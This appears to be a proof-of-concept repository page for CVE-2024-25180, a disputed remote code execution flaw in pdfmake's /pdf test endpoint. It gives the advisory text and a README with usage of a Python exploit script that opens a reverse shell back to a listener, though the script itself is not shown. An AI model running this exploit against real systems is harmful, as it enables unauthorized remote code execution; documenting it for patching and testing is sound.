CVE-2024-25180 PoC — pdfmake security vulnerability

Associated Vulnerability
Title: pdfmake security vulnerability (CVE-2024-25180)
Description: An issue discovered in pdfmake 0.2.9 allows remote attackers to run arbitrary code via crafted POST request to the /pdf endpoint. NOTE: this is disputed because the behavior of the /pdf endpoint is intentional. The /pdf endpoint is only available after installing a test framework (that lives outside of the pdfmake application). Anyone installing this is responsible for ensuring that it is only available to authorized testers.
Readme
# CVE-2024-25180

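## Overview
pdfmake provides client/server-side PDF printing in pure JavaScript.
Affected versions of this package are vulnerable to arbitrary code injection: an attacker can execute arbitrary code by sending a crafted POST request to the /pdf path. By sending a crafted request, the attacker can execute arbitrary code on the system.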

CVE-2024-25180 Remote Code Execution in pdfmake

## Script Usage
```
python3 CVE-2024-25180.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>

python3 CVE-2024-25180.py 192.168.140.42 1234 192.168.45.208 80
```
Listen on port 80 to receive the reverse shell.

![image](https://github.com/user-attachments/assets/42e08e9e-ebe7-41c7-84f3-424558754b75)

File Snapshot

[4.0K] /data/pocs/06ba9fcdd499eeb7d25b82827db657e4667483d3
├── [ 890] CVE-2024-25180.py
└── [ 683] README.md

0 directories, 2 files